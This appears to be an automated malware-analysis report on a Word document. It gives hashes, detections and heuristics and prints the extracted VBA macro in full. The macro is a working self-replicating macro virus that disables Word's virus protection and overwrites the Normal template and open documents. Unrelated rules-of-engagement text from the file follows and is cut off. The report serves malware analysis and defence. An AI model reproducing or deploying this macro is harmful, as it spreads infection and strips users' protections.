Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a3ca77798a18beac…

MALICIOUS

Office (OLE)

65.5 KB Created: 2001-07-06 19:55:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b02a37f623121b1cef0c40eda83ff6c1 SHA-1: e31b238d88c31c93ffc7e8a73ba61ef04876225b SHA-256: a3ca77798a18beac2ff6b523866dd7fccf48623b5d23650936fa2c67e3f427d8
188 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code automatically when the document is opened. The ClamAV detection 'Doc.Trojan.Thus-10' strongly suggests malicious intent. The VBA code appears to be designed to ensure its own execution and potentially download further stages, although the exact payload mechanism is obfuscated.

Heuristics 4

  • ClamAV: Doc.Trojan.Thus-10 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Thus-10
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Urgency / deadline lure low SE_URGENCY_LURE
    Document contains urgency or deadline language ('account will be terminated', 'action required within 24 hours', etc.) — useful context, but low-signal without other findings

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16550 bytes
SHA-256: 68c3b7764988b10c783ac3ba5cd6f16c9724695e9b8b03553ab6f5b53a962256
Detection
ClamAV: Doc.Trojan.Thus-10
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'Thus_001'
'Anti-Smyser'
' This virus is an alteration of a virus which was
' designed to delete all files from one's C: drive on Dec 13th.
' This code is completely benign.
    On Error Resume Next
    Application.Options.VirusProtection = False
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Anti-Smyser'" Then
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
        .DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
        .CodeModule.CountOfLines
    End If
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
        .InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
        .CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
        .Item(1).CodeModule.CountOfLines)
    End If
    



    
    For k = 1 To Application.Documents.Count
        If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Anti-Smyser'" Then
            Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
            .CodeModule.DeleteLines 1, Application.Documents.Item(k) _
            .VBProject.VBComponents.Item(1).CodeModule.CountOfLines
        End If
        If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
            Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
            .CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _
            .Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _
            .VBComponents.Item(1).CodeModule.CountOfLines)
        End If
    Next k
End Sub
Private Sub Document_Close()
    Document_Open
End Sub
Private Sub Document_New()
    Document_Open
End Sub











































                                                                                                                                                    











      
           
  is authorised.

L03 Use of minimum force to defend friendly forces and Persons with Designated Special Status (PDSS) against forces demonstrating hostile intent is authorised.

L04 Use of minimum force to prevent the taking possession of or destruction of force property is authorised.

L05 Use of minimum force to prevent the taking possession of or destruction of property with designated special status is authorised.  Individual service personnel are to be informed when they are protecting specific property on this basis.

L06 Use of minimum force to defend against intrusion by hostile forces/ belligerents into Assembly Areas, Military Restricted Areas or other areas designated by an Authorised Commander is authorised.

L07 Use of minimum force against any armed individuals who fail to comply with instructions issued by KFOR personnel engaged in the execution of their duties is authorised.

L08 Detention of hostile forces/belligerents who obstruct friendly forces, but only after appropriate non-forcible attempts to negate such obstruction have failed, is authorised.

L09 Detention of hostile forces/belligerents who attempt to enter controlled areas, commit assaults on friendly forces, commit or threaten to commit serious crimes against friendly forces or attack friendly force property is authorised.

L10 Detention of civilians who obstruct the progress of friendly forces whether by demonstration, riot, or other means is authorised.

L11 Detention of civilians who enter or attempt to enter, without authority, any area controlled by friendly forces is authorised.

L12 Detention of civilians who commit any assault upon any member of friendl
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.